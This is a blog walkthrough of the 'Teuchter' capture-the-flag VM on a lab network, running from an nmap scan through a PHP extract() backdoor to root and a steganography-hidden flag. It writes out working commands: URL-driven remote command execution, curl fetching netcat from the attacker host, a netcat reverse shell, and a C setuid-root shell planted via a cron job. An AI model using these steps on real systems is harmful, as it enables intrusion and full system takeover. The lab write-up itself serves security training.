Mr_H4sh

Infosec, CTF and more

Teuchter Solution

In this post I’m going to show you how to solve the Teuchter VM provided by Knightmare.

You can find the VM on this link

192.168.56.140 <== attacker
192.168.56.139 <== victim

I run a Nmap scan against the victim:

Nmap scan report for 192.168.56.139
Host is up, received arp-response (0.00037s latency).
Scanned at 2016-09-24 11:11:25 BST for 9s
Not shown: 65534 closed ports
Reason: 65534 resets
PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Dinnae Pwn Ma Server... Away and Hack some bawbag else!
MAC Address: 00:0C:29:BE:56:32 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
TCP/IP fingerprint:
OS:SCAN(V=7.12%E=4%D=9/24%OT=80%CT=1%CU=38656%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=57E65157%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10D%TI=Z%CI=I%II=I
OS:%TS=8)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6
OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Ok, port 80 open with Apache httpd 2.4.18 running, I open a browser to see what’s running. Hahaha, a scottish Wullie from The Simpsons.

The source code of the page has some interesting comments:

<!-- Wullie's favourite film is the Breakfast Club -->
<!-- /gallery/ /flicks/ or /telly/ Maybe Jim Kerr can help with the music...?  -->
<!-- not a lot of people know about different extensions, such as .pht for PHP -->

I visit the URL http://192.168.56.139/gallery/ and I find a series of images, with comments for each on the source code.

I find http://192.168.56.139/flicks/phpinfo.pht, but it gives me an internal server error when I open it.

I do some google research and I find out that there’s a particular backdoor that is affecting the .pht files, especially on the “extract” function. I get some details from this URL which explain the vulnerability: https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html

So I manage to get a reverse shell using the following URLs:

Check that the vulnerability works

http://192.168.56.139/flicks/phpinfo.pht?ctime=system&atime=whoami

I get “www-data”, so it works. Time to get a reverse shell.

Download Netcat and put it “/tmp/” and make it executable

http://192.168.56.139/flicks/phpinfo.pht?ctime=system&atime=curl%20http://192.168.56.140/nc%20%3E%20/tmp/nc
http://192.168.56.139/flicks/phpinfo.pht?ctime=system&atime=chmod%20777%20/tmp/nc

Execute a reverse shell

http://192.168.56.139/flicks/phpinfo.pht?ctime=system&atime=/tmp/nc%20192.168.56.140%208080%20-e%20/bin/bash

Once got a reverse shell I look for a way to get a stable shell. There’s python installed, so I spawn a shell through it:

locate python
/usr/bin/python3

python3 -c "import pty; pty.spawn('/bin/bash');"

Now that I have a shell, I go to the /home and I see that I can access to the “jkerr” page, where there’s a file called “login.txt” with a hint to a password:

www-data@teuchter:/home/jkerr$ ls -l
ls -l
total 3932
-rw-rw-r-- 1 jkerr jkerr 3429261 Jul  2 14:29 breakfastclub.jpg
-rw-rw-r-- 1 jkerr jkerr     234 Jul  9 12:10 login.txt
-rw------- 1 jkerr jkerr  588685 Jul  9 13:22 promisedyouamiracle.jpg
www-data@teuchter:/home/jkerr$ cat login.txt
cat login.txt
Jim,

I decided to rename your account to jkerr and reset the password
you'll find it in the photo. Just remember the decode password
dosn't have a space.

If you can't figure it out, it's the new name for Jonny & the
Self-Abusers...

I thought there would be a password within the image, but actually it comes out that it was the name of the file, which I found out thanks also to a list of passwords generated by a wordlist retrieved from the web application. The password of jkerr was “breakfastclub”, as also mentioned in the comment on the web application.

Once got into jkerr, I download the images and I see that the file “promisedyouamiracle.jpg” contains some information within the “Copyright” section which I’ve retrieved using “exiftool”:

# exiftool promisedyouamiracle.jpg 
ExifTool Version Number         : 10.31
File Name                       : promisedyouamiracle.jpg
Directory                       : .
File Size                       : 575 kB
File Modification Date/Time     : 2016:07:09 13:22:13+01:00
File Access Date/Time           : 2016:11:19 17:07:51+00:00
File Inode Change Date/Time     : 2016:11:17 21:51:04+00:00
File Permissions                : rw-------
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.02
DCT Encode Version              : 100
APP14 Flags 0                   : (none)
Exif Byte Order                 : Big-endian (Motorola, MM)
Copyright                       : Z2VtaW5pCg==
Padding                         : (Binary data 2060 bytes, use -b option to extract)
Compression                     : JPEG (old-style)
[..]
Photoshop Format                : Optimized
Progressive Scans               : 3 Scans
About                           : uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b
Rights                          : Z2VtaW5pCg==
Image Width                     : 800
Image Height                    : 600
[..]

The string “Z2VtaW5pCg==” is a base64 encoded string for “gemini”. This is the password for the user “proclaimers”. I login as proclaimers and I get into the folder “/home/proclaimers” and see the list of files.

proclaimers@teuchter:~$ pwd
pwd
/home/proclaimers
proclaimers@teuchter:~$ ls -l
ls -l
total 228
drwx------ 2 proclaimers proclaimers   4096 Jul  9 12:49 500miles
-rw-rw-r-- 1 proclaimers proclaimers 225280 Nov 13 14:32 500miles.tar
drwxr-xr-x 2 proclaimers proclaimers   4096 Nov 17 21:58 letterfromamerica
proclaimers@teuchter:~$ cd letterfromamerica
cd letterfromamerica
proclaimers@teuchter:~/letterfromamerica$ ls -l
ls -l
total 172
-rwsr-xr-x 1 root root   8736 Nov 17 21:58 semaphore
-r-Sr-sr-t 1 root root     42 Jul  9 13:57 test

That “semaphore” file is a copy of the “dash” shell, and it has the SUID but set. At this point I suspect there must be a cronjob, so I search for something that might use “semaphore”

proclaimers@teuchter:~$ grep -R "semaphore" /usr/local 2>/dev/null
grep -R "semaphore" /usr/local 2>/dev/null
/usr/local/bin/numpties.sh:## Plant a semaphore in to alert the monitoring system
/usr/local/bin/numpties.sh:if /usr/bin/[ -f /home/proclaimers/letterfromamerica/semaphore ]
/usr/local/bin/numpties.sh:    /bin/chown root.root /home/proclaimers/letterfromamerica/semaphore
/usr/local/bin/numpties.sh:    /bin/chmod 4755 /home/proclaimers/letterfromamerica/semaphore

proclaimers@teuchter:~$ cat /usr/local/bin/numpties.sh
cat /usr/local/bin/numpties.sh
#!/bin/sh

## Right, time to sort out these numpties that put PHP shells on ma server!

## Steal a copy to examine later
/bin/tar czvf /root/shells.tgz /var/www/html/*.php

## Aww they dobbers with primative Egpytian Encryption can away and raffle themselves
sudo apt-get -y purge openssh-server sftp wget 

## Delete the shells to annoy the eejits
/bin/rm -rf /var/www/html/*.php

## Plant a semaphore in to alert the monitoring system
if /usr/bin/[ -f /home/proclaimers/letterfromamerica/semaphore ]
  then
    /bin/chown root.root /home/proclaimers/letterfromamerica/semaphore
    /bin/chmod 4755 /home/proclaimers/letterfromamerica/semaphore
fi

Ok, this means that a cronob will add the SUID bit to semaphore if the file exists. I can replace the file with a script that I write where I run a bash as root:

$ cat shell.c 
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
  setuid(0); setgid(0); system("/bin/bash");
}

$ gcc -o semaphore shell.c && chmod 777 semaphore

After a minute, I see that the new script has the SUID set, so I run it and I’m root:

proclaimers@teuchter:~/letterfromamerica$ ls -l
ls -l
total 172
-rwsr-xr-x 1 root root   8736 Nov 17 21:58 semaphore

proclaimers@teuchter:~/letterfromamerica$ ./semaphore
./semaphore
root@teuchter:~/letterfromamerica# id
id
uid=0(root) gid=0(root) groups=0(root),1002(proclaimers)
root@teuchter:~/letterfromamerica# 

Got root, now it’s time for a flag.

root@teuchter:/root# ls -l
ls -l
total 1084
-rw-r--r-- 1 root root 1094752 Jul  9 14:58 flag.jpg
-rw-r--r-- 1 root root     108 Sep 23 09:48 flag.txt
drwx------ 3 root root    4096 Aug  1 22:18 re-record-not-fade-away
-rw-r--r-- 1 root root      45 Nov 19 17:30 shells.tgz
root@teuchter:/root# cat flag.txt
cat flag.txt
I say! I say! I say boy! Y'all interested in hochmagandy again...?

Y'all know this aint the correct flag! 

Well, tipical of Knightmare. It’s not over. There’s a folder called “re-record-not-fade-away”. I get in and after a few folders I find a zip file:

---------- 1 root root 12398481 Aug  1 22:11 TeuchterESX.zip
<e-away/on/and/on/and/on/and/on/and/on/and/ariston# pwd
pwd
/root/re-record-not-fade-away/on/and/on/and/on/and/on/and/on/and/ariston
<e-away/on/and/on/and/on/and/on/and/on/and/ariston# ls -l
ls -l
total 12108
---------- 1 root root 12398481 Aug  1 22:11 TeuchterESX.zip

I download the zip file, which is protected by password. The password is “teuchter”.

Once unzipped, theres a vmdk file called TeuchterESX.vmdk.

I mount it on my Kali machine and restart the machine, and mount it with vmfs-fuse. I find an iso within this folder, so I mount it too:

root@kali:~/Desktop/lab/teuchter# cd mount/
root@kali:~/Desktop/lab/teuchter/mount# ls -l
total 8
-rw------- 1 root root  180 Aug  1 21:52 hint.txt
drwxr-xr-x 2 root root 1120 Aug  1 21:52 redkola
root@kali:~/Desktop/lab/teuchter/mount# ls -l redkola/
total 2056
-rw------- 1 root root 104857600 Aug  1 21:24 redkola_1-flat.vmdk
-rw------- 1 root root       493 Aug  1 21:24 redkola_1.vmdk
-rw------- 1 root root    432128 Aug  1 21:51 redkola.iso
-rw------- 1 root root      8684 Aug  1 21:26 redkola.nvram
-rw-r--r-- 1 root root         0 Aug  1 21:08 redkola.vmsd
-rwxr-xr-x 1 root root      2147 Aug  1 21:26 redkola.vmx
root@kali:~/Desktop/lab/teuchter/mount# mkdir ../redkola_iso && cp -R redkola/ ../redkola_iso
root@kali:~/Desktop/lab/teuchter/mount# cd ../redkola_iso && mkdir mount
root@kali:~/Desktop/lab/teuchter/redkola_iso# mount -o loop redkola.iso mount/
mount: /dev/loop0 is write-protected, mounting read-only
root@kali:~/Desktop/lab/teuchter/redkola_iso# ls -l mount/
total 74
-r-xr-xr-x 1 root root 75110 Aug  1 21:38 glass_ch.jpg

This image is just a picture of Irn-Bru (glass cheque). There’s nothing else in this folder, so I suppose there’s something hidden in the image which I could retrieve using “steghide”.

I read the hint into the Teutcher.vmdk that I’ve mounted through vmfs-fuse, and this is what I find:

root@kali:~/Desktop/lab/teuchter/mount# cat hint.txt 
Almost there.. Check the ISO and remember password relates to the TV Advert you watched.

I took out the spaces but it's 25 characters but the Wikipedia page will get it for you.

I get back on the web application, and on the /telly source code there’s a hint on the second video:

<!-- noise up those crazy yanks 1st hint to a password -->
<video height="300" width="400" controls>
<source src="girders.ogv" type="video/ogg">
</video>

At this point I watch the video again, and at the end of the video it says “Made in Scotland from girders”. I search on the wikipedia page the advertisements’ titles, and the one of the video that I’ve watched is indeed “Made in Scotland from girders”. This title, without spaces, is exactly 25 characters. so, I try to use “steghide” using the passphrase “madeinscotlandfromgirders”, and I get the flag:

root@kali:~/Desktop/lab/teuchter# steghide extract -sf glass_ch.jpg 
Enter passphrase: 
wrote extracted data to "realflag.txt".
root@kali:~/Desktop/lab/teuchter# cat realflag.txt 

Gaun Yersel Big Man! B-)

Congratulations for the fifth time on capturing this flag!

Yes, I know this VM has really got on your nerves, and that was the main
point...

I decided to have some fun with you, and hopefully you have learned some
new ways to look at things. You know, all this could have been avoided
if Siri just leanred what "outwith" means, I wouldn't have to build this
VM. I'm trolling you again of course!

I hope this VM was fun for you, and I'm sure you can now insult people
in another language :-)

Thanks to mrb3n who shared a joke with me and pushing me to set up a VM
for trolling everyone.

Shout-outs yet again to #vulnhub for hosting a great learning tool and
being a great inspiration to make these VMs. A special thanks goes to
mrb3n, cmaddy and GKNSB for repeated testing. Many thanks to g0tM1lk
for providing some valuable feedback and offering to host my CTF again.
                                                           --Knightmare

Thank you to Knightmare for the VM and Vulnhub for hosting it. For any information or comment, please do not hesitate to leave a comment.